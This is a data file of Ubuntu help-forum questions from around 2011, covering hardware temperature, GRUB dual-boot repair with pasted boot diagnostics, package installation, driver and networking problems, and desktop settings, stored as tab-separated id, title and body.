37113	what can i do to reduce temperature using various throttling techniques in 10.04 ?	currently all i 'm doing is to use sysfs to force both cores into powersave mode , however i 'm curious if there are other ways to throttle various parts of the laptop . the specification is dell inspiron 640m core duo t5600 ( 1.83ghz / 2mb cache ) centrino ( if that gives any indication to the chipset/graphics/etc ) intel onboard graphics 1gb memory 250gb hitachi hdd ( i assume it 's 5400rpm since it was low priced , unless all 2.5 '' drives are 7200rpm now ? ) currently , ubuntu is allowing me to select 1 / 1.33 / 1.83ghz profiles for my cpu , can this be dropped lower or are these simply all the cpu provides ? other steps i 'm considering to drop the temperature ( please let me know if they are worthwhile ) are , switching to ssd getting a laptop cooling pad thanks for any advice : ) edit : just some background info , i want to turn this into a server to run all day/night , and living in hk , ambient temps might get as high as 40c , as i 'm not going to leave the air conditioning on while i 'm at work . i left it on overnight , it was about 30c last night i think , and this morning awoke to 50c internal/cpu and 45c hdd , with the lid closed and essentially idle . opening the lid seems to drop the temp back down to 40-45c all around , so i guess i 'll be leaving the lid up .
37116	after moving hard drive to new computer , networking is not detected	i want to move my ubuntu installation to a new computer , i move the hard drive and boot but the networking is not found . if i install on the new computer from scratch , networking is fine . what can i do ? any help would be appreciated .
37118	how do i free hard disk space allocated by virtual box disks ?	i had multiple ubuntu vm 's installations , and the host is also ubuntu 10.04 lts . after i deleted the vm 's , the space was n't reallocated to the host . do you know any solution ?
37119	all 10.10 apps will work after going to 11.04 ?	as many of you , i use my ubuntu machine for work , in my case , development . as i am very anxious to go 11.04 as soon as it goes live , will my previous 10.10 applications work on 11.04 ?
37126	hp laserjet 1018 printer keeps asking me to install it everytime i plug it in	i just upgraded to ubuntu 11.04 beta 2 from ubuntu 10.10 on my netbook ( a dell mini 1012 ) . the problem is i have a hp laserjet 1018 printer which i had it installed in ubuntu 10.10 without any problems . but after i 've upgraded to 11.04 , every time i plug it in it asks for downloading the proprietary plugin and installs it then when i remove the cable and plug it in again it downloads the plugin again . i never had this problem in 10.10 . does anyone know how to solve this problem ?
37127	grub2 wont start after installing ubuntu on separate harddisk	this is n't the first time i 've installed ubuntu . the first time i had ubuntu and w7 booting from the same drive ( worked fine using conventional tricks ) . this time i am booting from a separate hard drive ( not so good this time ) . now . i have w7 installed first on my main ssd . then had ubuntu installed on a separate hard drive . after installing ubuntu 10.10 , grub2 did n't show , so i went ahead did the conventional methods of recovering grub , as listed on this website : https : //help.ubuntu.com/community/grub2 # reinstalling % 20from % 20livecd i tried both method 1 and method 2 . no errors on both . i get something along the lines of `` installation complete . no errors . '' then i reboot . loads straight to windows , no grub menu //my linux drive is sda5//my w7 is on sdb// -i tried shift on bios , no good . the only method that worked was using super grub2 . i dont like the idea of putting in a cd to start linux every time . my question is , are the conventional methods the wrong way to go , because ubuntu is installed on a separate hard drive ? also , note there are no errors when i do method 1 and method 2 .
37129	make application always on visible workspace by default ?	i want my calculator to always appear on the visible workspace . right now , i have to right click its title bar every time i open it and check the option , but i know earlier versions of compiz allowed me to make this automatic for every instance of specified programs . is there still a way to do this , and if so , how ?
37131	how to make gnome classic the default desktop using command line tools ?	how to make gnome classic the default desktop on natty using command line ?
37132	how do i find the last logged system boot and shutdown times ?	i 'm a rails developer working on a web application on ubuntu server 10.04 . due to internal requirements , i was asked to find the last 10 system boot and shutdown times ... i have no clue where to find these details . could someone help me out ?
37133	what 's the history of ubuntu ?	what is the history of ubuntu ? how did ubuntu originate ? who were the people involved ?
37135	how do i generate a file with suitable permissions using sprintf ( ) & write ( ) ?	# include < stdio.h > # include < stdlib.h > # include < fcntl.h > # include < sys/stat.h > void main ( ) { char tmp [ 12 ] = { 0x0 } ; int i=13 ; sprintf ( tmp , '' % 11d '' , i ) ; int fd = open ( `` transaction.txt '' , o_creat | o_rdwr ) ; write ( fd , tmp , sizeof ( tmp ) ) ; } i 'm trying to write integers to a file . because linux does not offer itoa function , i have to try to use sprintf . but i ca n't read the result file . the file created is owned by me but has permissions -- -- -- xr-x . this means that my user ca n't read or write the file and my group has no access at all but strangely other users can read it . the file is readable if i run sudo cat transaction.txt which gives 13 as expected . how can i generate a file with suitable permissions so that is is usable .
37139	how to show icon googsystray ?	i have upgrade my ubuntu from maverick to natty , and my problem is googlesystray not show in panel . but the app is work . how to show icon notification in unity panel ?
37140	what 's the best way to natty narwhal 11.04 upgrade ?	format and install from zero or upgrade my current 10.10 ubuntu installation ? if i upgrade my current ubuntu , is it possible that i will not have the same look and feel of a fresh installation ?
37141	installing a tar.bz2	i am trying to install laidout-0.0o91.tar.bz2 . its a publishing program for linux . can you please give me the right terminal instructions to install this on my system .
37147	what are the differences between the ubuntu shipped kernel and the upstream kernel ?	what are the differences in feature set between the main linux kernel and the kernel being used by ubuntu ? why is ubuntu branched off of the main kernel instead of using the main kernel directly ?
37149	grub . dual boot windows xp and lubuntu	i know there are several posts on this already , but i am unable to figure out how to fix my boot loader by reading the forums . i have tried both grub and grub2 and have been unable to successfully boot windows xp . the file system is still there but when i try to load windows from grub i just get a blank screen and then grub reboots ... any idea 's on what i can do ? edit : i tried super grub2 however only linux kernels were listed ... i tried with super grub and still not dice ... edit : i ran the bash script as @ wojox suggested . results show core . img is missing ? : boot info script 0.55 dated february 15th , 2010 ============================= boot info summary : ============================== = > syslinux is installed in the mbr of /dev/sda sda1 : _________________________________________________________________________ file system : ntfs boot sector type : grub 2 boot sector info : grub 2 is installed in the boot sector of sda1 and looks at sector 473985688 of the same hard drive for core.img , but core.img can not be found at this location . no errors found in the boot parameter block . operating system : windows xp boot files/dirs : /boot.ini /ntldr /ntdetect.com /ubuntu/winboot/wubildr.mbr /ubuntu/winboot/wubildr sda2 : _________________________________________________________________________ file system : extended partition boot sector type : - boot sector info : sda5 : _________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 10.10 boot files/dirs : /boot/grub/menu.lst /boot/grub/grub.cfg /etc/fstab sda6 : _________________________________________________________________________ file system : swap boot sector type : - boot sector info : =========================== drive/partition info : ============================= drive : sda ___________________ _____________________________________________________ disk /dev/sda : 250.0 gb , 250000000000 bytes 255 heads , 63 sectors/track , 30394 cylinders , total 488281250 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start end size id system /dev/sda1 * 63 322,706,093 322,706,031 7 hpfs/ntfs /dev/sda2 322,707,454 488,280,063 165,572,610 5 extended /dev/sda5 322,707,456 481,447,935 158,740,480 83 linux /dev/sda6 481,449,984 488,280,063 6,830,080 82 linux swap / solaris blkid -c /dev/null : ____________________________________________________________ device uuid type label /dev/loop0 squashfs /dev/sda1 a4f02d76f02d503a ntfs os /dev/sda2 : pttype= '' dos '' /dev/sda5 f16f8a16-93e2-4928-a21b-4a43f51913a7 ext4 /dev/sda6 d2d9f632-3ec6-4a81-9781-11397345d694 swap /dev/sda : pttype= '' dos '' ============================ `` mount | grep ^/dev output : =========================== device mount_point type options aufs / aufs ( rw ) /dev/sr0 /cdrom iso9660 ( ro , noatime ) /dev/loop0 /rofs squashfs ( ro , noatime ) ================================ sda1/boot.ini : ================================ [ boot loader ] timeout=30 default=multi ( 0 ) disk ( 0 ) rdisk ( 0 ) partition ( 1 ) \windows [ operating systems ] multi ( 0 ) disk ( 0 ) rdisk ( 0 ) partition ( 1 ) \windows= '' microsoft windows xp professional '' /noexecute=optin /fastdetect =========================== sda5/boot/grub/menu.lst : =========================== # menu.lst - see : grub ( 8 ) , info grub , update-grub ( 8 ) # grub-install ( 8 ) , grub-floppy ( 8 ) , # grub-md5-crypt , /usr/share/doc/grub # and /usr/share/doc/grub-legacy-doc/ . # # default num # set the default entry to the entry number num . numbering starts from 0 , and # the entry number 0 is the default if the command is not used . # # you can specify 'saved ' instead of a number . in this case , the default entry # is the entry saved with the command 'savedefault ' . # warning : if you are using dmraid do not use 'savedefault ' or your # array will desync and will not let you boot your system . default 0 # # timeout sec # set a timeout , in sec seconds , before automatically booting the default entry # ( normally the first entry defined ) . timeout 3 # # hiddenmenu # hides the menu by default ( press esc to see the menu ) hiddenmenu # pretty colours # color cyan/blue white/blue # # password [ ' -- md5 ' ] passwd # if used in the first section of a menu file , disable all interactive editing # control ( menu entry editor and command-line ) and entries protected by the # command 'lock' # e.g . password topsecret # password -- md5 $ 1 $ glhu0/ $ aw78khk1qfv3p2b2znuoe/ # password topsecret # # examples # # title windows xp # root ( hd0,0 ) # makeactive # chainloader +1 # # title linux # root ( hd0,1 ) # kernel /vmlinuz root=/dev/hda2 ro # # # put static boot stanzas before and/or after automagic kernel list # # # begin automagic kernels list # # lines between the automagic kernels list markers will be modified # # by the debian update-grub script except for the default options below # # do not uncomment them , just edit them to your needs # # # # start default options # # # # default kernel options # # default kernel options for automagic boot options # # if you want special options for specific kernels use kopt_x_y_z # # where x.y.z is kernel version . minor versions can be omitted . # # e.g . kopt=root=/dev/hda1 ro # # kopt_2_6_8=root=/dev/hdc1 ro # # kopt_2_6_8_2_686=root=/dev/hdc2 ro # kopt=root=uuid=f16f8a16-93e2-4928-a21b-4a43f51913a7 ro # # default grub root device # # e.g . groot= ( hd0,0 ) # groot=f16f8a16-93e2-4928-a21b-4a43f51913a7 # # should update-grub create alternative automagic boot options # # e.g . alternative=true # # alternative=false # alternative=true # # should update-grub lock alternative automagic boot options # # e.g . lockalternative=true # # lockalternative=false # lockalternative=false # # additional options to use with the default boot option , but not with the # # alternatives # # e.g . defoptions=vga=791 resume=/dev/hda5 # defoptions=quiet splash # # should update-grub lock old automagic boot options # # e.g . lockold=false # # lockold=true # lockold=false # # xen hypervisor options to use with the default xen boot option # xenhopt= # # xen linux kernel options to use with the default xen boot option # xenkopt=console=tty0 # # altoption boot targets option # # multiple altoptions lines are allowed # # e.g . altoptions= ( extra menu suffix ) extra boot options # # altoptions= ( recovery ) single # altoptions= ( recovery mode ) single # # controls how many kernels should be put into the menu.lst # # only counts the first occurence of a kernel , not the # # alternative kernel options # # e.g . howmany=all # # howmany=7 # howmany=all # # specify if running in xen domu or have grub detect automatically # # update-grub will ignore non-xen kernels when running in domu and vice versa # # e.g . indomu=detect # # indomu=true # # indomu=false # indomu=detect # # should update-grub create memtest86 boot option # # e.g . memtest86=true # # memtest86=false # memtest86=true # # should update-grub adjust the value of the default booted system # # can be true or false # updatedefaultentry=false # # should update-grub add savedefault to the default options # # can be true or false # savedefault=false # # # # end default options # # title ubuntu 10.10 , kernel 2.6.35-28-generic uuid f16f8a16-93e2-4928-a21b-4a43f51913a7 kernel /boot/vmlinuz-2.6.35-28-generic root=uuid=f16f8a16-93e2-4928-a21b-4a43f51913a7 ro quiet splash initrd /boot/initrd.img-2.6.35-28-generic title ubuntu 10.10 , kernel 2.6.35-28-generic ( recovery mode ) uuid f16f8a16-93e2-4928-a21b-4a43f51913a7 kernel /boot/vmlinuz-2.6.35-28-generic root=uuid=f16f8a16-93e2-4928-a21b-4a43f51913a7 ro single initrd /boot/initrd.img-2.6.35-28-generic title ubuntu 10.10 , kernel 2.6.35-22-generic uuid f16f8a16-93e2-4928-a21b-4a43f51913a7 kernel /boot/vmlinuz-2.6.35-22-generic root=uuid=f16f8a16-93e2-4928-a21b-4a43f51913a7 ro quiet splash initrd /boot/initrd.img-2.6.35-22-generic title ubuntu 10.10 , kernel 2.6.35-22-generic ( recovery mode ) uuid f16f8a16-93e2-4928-a21b-4a43f51913a7 kernel /boot/vmlinuz-2.6.35-22-generic root=uuid=f16f8a16-93e2-4928-a21b-4a43f51913a7 ro single initrd /boot/initrd.img-2.6.35-22-generic title ubuntu 10.10 , memtest86+ uuid f16f8a16-93e2-4928-a21b-4a43f51913a7 kernel /boot/memtest86+.bin # # # end debian automagic kernels list =========================== sda5/boot/grub/grub.cfg : =========================== # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod vbe insmod vga } insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set f16f8a16-93e2-4928-a21b-4a43f51913a7 if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=640x480 load_video insmod gfxterm fi terminal_output gfxterm insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set f16f8a16-93e2-4928-a21b-4a43f51913a7 set locale_dir= ( $ root ) /boot/grub/locale set lang=en insmod gettext if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # menuentry 'ubuntu , with linux 2.6.35-28-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set f16f8a16-93e2-4928-a21b-4a43f51913a7 linux /boot/vmlinuz-2.6.35-28-generic root=uuid=f16f8a16-93e2-4928-a21b-4a43f51913a7 ro quiet splash initrd /boot/initrd.img-2.6.35-28-generic } menuentry 'ubuntu , with linux 2.6.35-28-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set f16f8a16-93e2-4928-a21b-4a43f51913a7 echo 'loading linux 2.6.35-28-generic ... ' linux /boot/vmlinuz-2.6.35-28-generic root=uuid=f16f8a16-93e2-4928-a21b-4a43f51913a7 ro single echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-2.6.35-28-generic } menuentry 'ubuntu , with linux 2.6.35-22-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set f16f8a16-93e2-4928-a21b-4a43f51913a7 linux /boot/vmlinuz-2.6.35-22-generic root=uuid=f16f8a16-93e2-4928-a21b-4a43f51913a7 ro quiet splash initrd /boot/initrd.img-2.6.35-22-generic } menuentry 'ubuntu , with linux 2.6.35-22-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set f16f8a16-93e2-4928-a21b-4a43f51913a7 echo 'loading linux 2.6.35-22-generic ... ' linux /boot/vmlinuz-2.6.35-22-generic root=uuid=f16f8a16-93e2-4928-a21b-4a43f51913a7 ro single echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-2.6.35-22-generic } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set f16f8a16-93e2-4928-a21b-4a43f51913a7 linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set f16f8a16-93e2-4928-a21b-4a43f51913a7 linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry `` microsoft windows xp professional ( on /dev/sda1 ) '' { insmod part_msdos insmod ntfs set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set a4f02d76f02d503a drivemap -s ( hd0 ) $ { root } chainloader +1 } # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # =============================== sda5/etc/fstab : =============================== # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda5 during installation uuid=f16f8a16-93e2-4928-a21b-4a43f51913a7 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda6 during installation uuid=d2d9f632-3ec6-4a81-9781-11397345d694 none swap sw 0 0 =================== sda5 : location of files loaded by grub : =================== 197.6gb : boot/grub/grub.cfg 242.7gb : boot/grub/menu.lst 166.2gb : boot/initrd.img-2.6.35-22-generic 166.3gb : boot/initrd.img-2.6.35-28-generic 242.8gb : boot/vmlinuz-2.6.35-22-generic 242.8gb : boot/vmlinuz-2.6.35-28-generic 166.3gb : initrd.img 166.2gb : initrd.img.old 242.8gb : vmlinuz 242.8gb : vmlinuz.old
37150	will there ever be blur effect on the launcher vertical bar ?	i have asked this multiple times before in other sites but no one seemed interested to answer me . when will the blur effect be implemented ? i am guessing canonical already has this in their list since it just does n't look good when the launcher is over a white background , everything just gets too blurry . i 'd just like to know when or this is n't going to be implemented at all ?
37155	swap option and command on an mbp	i am running 11.04 on a 2011 13 '' macbook pro . everything ( except wireless ) is working correctly . however , the command button acts like the `` super '' or `` windows '' button on a standard keyboard and option is the alt button . can i make it so the option/alt button acts like the super button while the command button acts like alt ? this would more correctly match a traditional pc keyboard layout . i would prefer a method that globally swaps the two , and not manually binding shortcut keys as the latter method seems to miss some non-configurable shortcuts ( in my experience ) .
37156	how to restore a single file from a package ?	how can i do this without reinstalling the rest of the files as well ?
37158	how do i change the sound menu 's default music player ?	i 'm running maverick at the moment and the default music player is rhythmbox . it interfaces with the panel through the sound menu , so you can see it playing like this : i know that , in natty , banshee is due to be the default music player , so i was trying it out the other day to get to grips with it . how can i change which music player interfaces with the panel like this ( from rhythmbox to banshee and then back again ) ? because , at the moment , when i run banshee , i just get this : ... and no banshee integration .
37159	is my processor 64 or 32 bit ?	i am on ubuntu and i did this command : $ uname -a linux slabrams-desktop 2.6.32-29-generic # 58-ubuntu smp fri feb 11 19:00:09 utc 2011 i686 gnu/linux does it mean i am on 32bit or 64 bit processor ? the reason i am trying to figure this out is that i was getting errors which looked like this : can not execute binary file and from googling , i thought it was a processor issue . any ideas ?
37163	show appmenu even when the top panel is not mouse overed	i would like to know if there 's any way i can keep the appmenu ( `` file '' , `` edit '' , `` help '' , etc ) displayed on unity 's top panel while i have focus on the app , without having to hover the top panel for the menu to be displayed . in other words , always show the appmenu of the current focused window no matter what the app window size is ( like mac osx ) . thanks
37165	what will be the new features of ubuntu 11.10 oneric ocelot ?	what new features and changes will be done for ubuntu 11.10 ?
37168	what is the shortcut for closing all of the open directory windows in nautilus ?	how can i close all the open nautilus windows in one swoop ? i 'm using 10.10 and 10.04 . i 'll take anything -- keyboard shortcut , command line command , or mouse action .
37170	i am unfamiliar with ubuntu on my dell mini ( pre-installed )	i got a dell mini that comes with ubuntu . i am unfamiliar with ubuntu and i do not know how i can use it . i have trouble connecting to the internet and i do not know what apps are available . i am quite frustrated ! can you give me information that will get me started to learn about ubuntu ?
37171	i have a 32-bit machine , can i use programs that are meant for 64-bit processors ?	i am using a 32-bit machine , but i am having to use a relatively obscure semantic database which only comes in 64-bit versions . what are my options for running it in my local dev environment ? currently when i try to run it , i get an error message that looks like this : can not execute binary file and when i check my machine info , i get this : $ uname -a linux slabrams-desktop 2.6.32-29-generic # 58-ubuntu smp fri feb 11 19:00:09 utc 2011 i686 gnu/linux
37174	what is the lightest desktop interface for ubuntu and is unity-2d classified as a 'light ' interface ?	with the plethora of potential interfaces available lxde , openbox , fluxbox xfce , gnome2 , gnome3 , unity-3d , unity-2d etc , my question is - what is meant by `` the lightest desktop interface '' - and can you now consider unity-2d as `` light '' ? any guidance on the pro 's and con 's would be extremely useful for my evaluation - my target computer is a pentium 4 1.3ghz , 512mb , 32gb hdd , 1024x768 monitor , geforce fx5500 256mb agp i would like to use it for web-browsing such as youtube , google-earth , simple graphical picture editing and word processing - all aimed for school student aged 10-15 yrs .
37177	upgraded with some problems . what happened to my panel ? the panels just disappeared	my panel is gone in my updated version of ubuntu . what happened ? lspci shows : 00:02.0 vga compatible controller : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) the panel is shown in normal ubuntu and is not here . the are is outlined in the normal shadow , but the side bar and the panel are showing . however if i slide my mouse across there then the normal volume changer and the like show . also it has infected my normal ubuntu ( classic ubuntu ) and the unity panel and siding are making it impossible for me to use my 2 application menus that are in the two right hand corners so i had to add one other to the mix in order to easily access my applications . this thing is getting far out of hand . need a fix here . here 's another picture of my problem :
37179	graphics very jerky on natty narwal	i just got a new laptop , and installed narwal on it . things like youtube videso play fine , however `` system graphics '' ( for lack of a better term ) are extremely jerky , for example closing a tab will take several seconds , or even typing in this text box gets several seconds behind where i am typing . my system hardware is pretty beefy , so it 's not a hardware issue : intel quad core 2ghz , 8gb of ram , and a radeon 6570m with 1gb ( running the proprietary driver ) .
37188	how to install wesnoth game from a tar.bz2 ?	i 'm trying to install wesnoth.org game on ubuntu . i have saved the file to my machine but do n't know what to do now since it is in a tar.bz2 format .
37193	how to stop wifi disconnection when eth0 link becomes ready ?	i have ubuntu 10.10 installed on my laptop and connected via wireless lan to my home network . now i want to play around with my old wifi equipment which i need to configure first . but every time i plug the ethernet cable in and the link on eth0 becomes ready ubuntu disconnects my wlan connection . which is extremely annoying as i ca n't surf as along as i 'm connected via ( cable ) ethernet . or generally speaking : as long as i 'm connected with a network from the `` wired '' tab . i already checked `` available to all users '' for my wlan and wired network so that they are available when i log in . but this does n't affect the problem mentioned above . do i need to get rid of the networkmanager to be able to stay connected to my wlan and wired network at the same time ? ( they do n't share the same network address pool . wlan is static ip , wired is dhcp with differenct ip network . )
37195	upgrade from 10.04 to 10.10 lost mbr	i think i 've lost my mbr upgrading from ubuntu 10.04 to 10.10 . during the upgrade it gave me a message saying which partitions did i want the grub details to go on , saying if i was unsure to select all of them . after reboot i just end up in a grub recovery console . the system was a dual boot with windows vista . any idea how i can get both my operating systems to work ? i 'm currently attempting to download a live cd of 10.10 but its a rather big download to fix what i assume is a small problem . worse than that i do n't have a clue how to fix it with the live cd . edit1 results from the boot info script http : //bootinfoscript.sourceforge.net/ boot info script 0.55 dated february 15th , 2010 ============================= boot info summary : ============================== = > grub 2 is installed in the mbr of /dev/sda and looks on the same drive in partition # 256 for /boot/grub . sda1 : _________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 boot sector info : no errors found in the boot parameter block . operating system : boot files/dirs : /bootmgr /boot/bcd sda2 : _________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 boot sector info : no errors found in the boot parameter block . operating system : windows vista boot files/dirs : /bootmgr /boot/bcd /windows/system32/winload.exe /wubildr.mbr /wubildr sda3 : _________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 boot sector info : no errors found in the boot parameter block . operating system : boot files/dirs : /ubuntu/winboot/wubildr.mbr /ubuntu/winboot/wubildr /ubuntu/disks/root.disk /ubuntu/disks/swap.disk sda3/wubi : _________________________________________________________________________ file system : ext4 boot sector type : grub 2 boot sector info : grub 2 is installed in the boot sector of sda3/wubi and looks at sector 21294336 of the same hard drive for core.img , but core.img can not be found at this location . mounting failed : mount : wrong fs type , bad option , bad superblock on /dev/loop1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so =========================== drive/partition info : ============================= drive : sda ___________________ _____________________________________________________ disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start end size id system /dev/sda1 63 24,563,384 24,563,322 27 hidden hpfs/ntfs /dev/sda2 * 24,563,712 256,700,415 232,136,704 6 fat16 /dev/sda3 256,700,416 488,394,751 231,694,336 7 hpfs/ntfs blkid -c /dev/null : ____________________________________________________________ device uuid type label /dev/loop0 squashfs /dev/loop1 c0de1566-8c76-4392-ac90-9f026a82f928 ext4 /dev/sda1 443c1d3ee49bed2a ntfs pqservice /dev/sda2 b898b25f98b21bb6 ntfs acer /dev/sda3 a4202e96202e6f8a ntfs data /dev/sda : pttype= '' dos '' ============================ `` mount | grep ^/dev output : =========================== device mount_point type options aufs / aufs ( rw ) /dev/sr0 /cdrom iso9660 ( ro , noatime ) /dev/loop0 /rofs squashfs ( ro , noatime )
37198	why are n't viruses an issue ?	i 'm using ubuntu right now and i think it 's really good . really . but i 'm wondering about viruses . i come from a mac background ( i have never got a virus ) and i 'm wondering how ubuntu does the same . it has `` millions of users '' so i 'm wondering why someone did n't make one yet . or does it have built-in protection ?
37204	why doesn ' t wireshark work ?	i installed wireshark . ran it . when i click on 'interface list ' , i get a list of 0 interfaces . i think that means i have some kind of configuration problem . i 'm guessing my kernel is n't configured for it ? how do i fix that ? i 'm hoping there is an easier solution than manually recompiling the kernel .
37208	can new kernel be deleted ?	i upgrade from lucid to maverick and got pretty messy i reinstall ubuntu maverick from live cd and so far i just had to reinstall all applications i had . but i have this list of kernel linux-image-2.6.35-22-generic 2.6.35-22.35 linux-image-2.6.35-28-generic 2.6.35-28.50 linux-image-generic 2.6.35.28.36 and im using currently this version linux 2.6.35-22-generic i686 im not sure if it 's safe to delete the new kernel .
37210	help restore driver after messing it	firstly i 'm new to ubuntu . well my problem is i have rtl8187l wireless usb adapter and i 'm using ubuntu 10.10.however , stock driver shipped with this ubuntu wo n't work with my adapter . it detect the device and allow me to connect to ap but after 10 seconds , it will disconnect itself . so i went to realtek website , download and install the new driver . however , after restart ubuntu ca n't detect my adapter anymore . how can i fix this problem and where can i find suitable driver for this adapter . please help me expert ...
37211	how to install .xpi file for firefox ?	hi everyone i just downloaded a download accelerator skdownloader for firefox 4 , i installed the program alright but now i 'm stuck at installing the accompanying add on .xpi for the program to be compatible with firefox . in windows all i had to do was open the .xpi with firefox and it will automatically install as an add on . how do i install the .xpi in ubuntu ?
37214	point cloud software	where can i find software for creating point clouds similar to ms photosynth without being a programmer .
37218	is it possble to install .pkg.dmg in ubuntu	i have a mac disc image of the software for my expresso usb modem in ghana . just as the title says can i convert and install the software for ubuntu ?
37219	how do i mount cd-rom at /media/cdrom0 ?	i 'm trying to install a game of mine using pol ( playonlinux ) , but the cd-rom must be mounted at /media/cdrom0 . instead , it is being mounted at /media/ ( diskname ) . is there a way i can fix this ?
37228	photo gallery screensaver	how can i set up a screensaver to randomly display images from one folder from the harddrive . this was extremely easy in windows , but i ca n't figure out how to set it up in ubuntu .
37230	hbase installation failure	i am trying to start hbase with the following command : hadoop @ user-hp-dx2480-mt-na125pa : /usr/local/hadoop/hbase $ bin/start-hbase.sh and the startup fails with the following errror : error are localhost : starting zookeeper , logging to /usr/local/hadoop/hbase/bin/../logs/hbase-hadoop-zookeeper-user-hp-dx2480-mt-na125pa.out localhost : java.net.bindexception : address already in use localhost : at sun.nio.ch.net.bind ( native method ) localhost : at sun.nio.ch.serversocketchannelimpl.bind ( serversocketchannelimpl.java:137 ) localhost : at sun.nio.ch.serversocketadaptor.bind ( serversocketadaptor.java:77 ) localhost : at sun.nio.ch.serversocketadaptor.bind ( serversocketadaptor.java:70 ) localhost : at org.apache.zookeeper.server.nioservercnxn $ factory . ( nioservercnxn.java:122 ) localhost : at org.apache.zookeeper.server.zookeeperservermain.runfromconfig ( zookeeperservermain.java:106 ) localhost : at org.apache.hadoop.hbase.zookeeper.hquorumpeer.runzkserver ( hquorumpeer.java:85 ) localhost : at org.apache.hadoop.hbase.zookeeper.hquorumpeer.main ( hquorumpeer.java:70 ) what is the solution for this ? can anyone tel me ? what is addressbindingexception ? ?
37234	ubuntu one : can this be used for backups ?	just setup a laptop with ubuntu 10.10 and noticed that ubuntu 's offering a free cloud-based sync service with 2gb of storage . what protocols/methods does ubuntu one support for connectivity ? i.e . can i mount it as a block-device like elastic block storage ? ssh ? more interested in using it for ubuntu server as a cheap off-site backup solution for webservers , etc .
37238	when will deb multi arch support be included in ubuntu ?	when will deb multi arch support be included in ubuntu ? is there any ongoing work ?
37239	remove original battery indicator from indicator applet	i 've added battery-status to the indicator applet , but i am having trouble removing the original battery applet ( stuck on `` estimating '' ) , and i currently have two battery icons in the indicator applet . going through the preferences of the original power applet , there is an option to never show the icon , but that options makes both icons disappear and leaves an empty space in the indicator applet , which acts like battery-status , that is its fully functional , but lacks the battery picture . this website : http : //www.omgubuntu.co.uk/2011/02/battery-applet-status-ubuntu/ claims that when i add battery-status to the indicator , i should be prompted to replace the original indicator but no such prompt appeared . i also removed gnome-power-manager=1 from /usr/share/indicator-application/ordering-override.keyfile but that changed nothing ( what exactly does removing that line even do , for curiosity 's sake ? ) the answer posted by madhava is no good . i 've already mentioned that doing what you are showing me makes the icon disappear for the battery-status as well as the original battery indicator . here is a video of this : http : //img860.imageshack.us/i/7mi.mp4 how do i get the battery-status icon to remain , and not just a blank space ? ?
